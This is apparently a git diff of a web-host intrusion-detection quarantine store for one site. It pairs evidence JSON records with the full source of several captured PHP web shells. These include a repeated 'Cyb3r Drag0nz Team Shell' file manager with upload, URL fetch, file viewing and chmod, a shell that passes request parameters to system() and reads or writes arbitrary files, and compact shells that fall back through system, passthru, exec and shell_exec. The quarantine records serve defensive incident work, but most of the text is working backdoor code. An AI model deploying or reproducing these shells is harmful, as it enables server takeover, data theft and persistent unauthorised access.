+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json.evidence.json b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json.evidence.json new file mode 100644 index 0000000..835dd74 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4887", + "log_excerpt": "[quarantine] www.archlinexp.eu:f46vc3nzn1qw.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353214, + "size": 10657, + "uid": 20043 + }, + "rel_path": "f46vc3nzn1qw.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/friska.php.json b/var/www/hosting/archlinexp.eu/www/friska.php.json new file mode 100644 index 0000000..f5bfed2 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/friska.php.json @@ -0,0 +1 @@ +[{"attr": [{"s": "'.$n.'';}}?>
"}]}] \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/friska.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/friska.php.json.evidence.json new file mode 100644 index 0000000..256be7b --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/friska.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4898", + "log_excerpt": "[quarantine] www.archlinexp.eu:friska.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/friska.php.json)", + "original_sha256": "80d56ff0d995aa16fc2c15e50ea9826d945ce6d52659a46f55e2692a5cac3d0d", + "original_stat": { + "gid": 30037, + "mtime": 1783709542, + "size": 478, + "uid": 20043 + }, + "rel_path": "friska.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json b/var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json new file mode 100644 index 0000000..0d0bf2f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json @@ -0,0 +1,6 @@ +
+
\ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json.evidence.json new file mode 100644 index 0000000..93103fe --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "7195", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/50nnp2o4xt.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json)", + "original_sha256": "ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1", + "original_stat": { + "gid": 30037, + "mtime": 1784278953, + "size": 298, + "uid": 20043 + }, + "rel_path": "images/50nnp2o4xt.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json b/var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json new file mode 100644 index 0000000..1714fc5 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json @@ -0,0 +1,68 @@ +"; + system($cmd); + echo "
"; +} +if(isset($_GET["upload"])) { + if(isset($_FILES["file"])) { + $name = $_FILES["file"]["name"]; + move_uploaded_file($_FILES["file"]["tmp_name"], $name); + echo "Uploaded: " . $name; + } else { + echo '
+ + +
'; + } +} +if(isset($_GET["download"])) { + $file = $_GET["download"]; + if(file_exists($file)) { + header("Content-Type: application/octet-stream"); + header("Content-Disposition: attachment; filename=" . basename($file)); + readfile($file); + } else { + echo "File not found: " . $file; + } +} +if(isset($_GET["delete"])) { + $file = $_GET["delete"]; + if(unlink($file)) { + echo "Deleted: " . $file; + } else { + echo "Delete failed: " . $file; + } +} +if(isset($_GET["info"])) { + phpinfo(); +} +if(isset($_GET["dir"])) { + $dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; + $files = scandir($dir); + foreach($files as $file) { + if($file != "." && $file != "..") { + echo $file . "\n"; + } + } +} +if(isset($_GET["read"])) { + $file = $_GET["read"]; + if(file_exists($file)) { + echo file_get_contents($file); + } else { + echo "File not found: " . $file; + } +} +if(isset($_GET["write"])) { + $file = $_GET["write"]; + $content = isset($_POST["content"]) ? $_POST["content"] : (isset($_GET["content"]) ? $_GET["content"] : ""); + if(file_put_contents($file, $content)) { + echo "Written: " . $file; + } else { + echo "Write failed: " . $file; + } +} +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json.evidence.json new file mode 100644 index 0000000..75c852f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5211", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/6iyo68ipsz.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json)", + "original_sha256": "b3cedb62555690bf309116f07bc6fd9beb53f3f58fd3e5fb1102636b084e5b50", + "original_stat": { + "gid": 30037, + "mtime": 1783947728, + "size": 1889, + "uid": 20043 + }, + "rel_path": "images/6iyo68ipsz.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..9daf097 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5165", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/backup.f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353231, + "size": 10657, + "uid": 20043 + }, + "rel_path": "images/backup.f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json b/var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json new file mode 100644 index 0000000..711797a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json.evidence.json new file mode 100644 index 0000000..0304a7a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5147", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json)", + "original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d", + "original_stat": { + "gid": 30037, + "mtime": 1783194677, + "size": 762, + "uid": 20043 + }, + "rel_path": "images/c_03e0fd55.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json b/var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json new file mode 100644 index 0000000..3b8ccaa --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json.evidence.json new file mode 100644 index 0000000..e8d0f67 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5164", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json)", + "original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8", + "original_stat": { + "gid": 30037, + "mtime": 1783201885, + "size": 762, + "uid": 20043 + }, + "rel_path": "images/c_7f0b46f9.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..b869253 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5167", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353216, + "size": 10657, + "uid": 20043 + }, + "rel_path": "images/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json b/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json.evidence.json new file mode 100644 index 0000000..d280d45 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5200", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/ko6h7s5e9kak.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381493, + "size": 10657, + "uid": 20043 + }, + "rel_path": "images/ko6h7s5e9kak.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json b/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

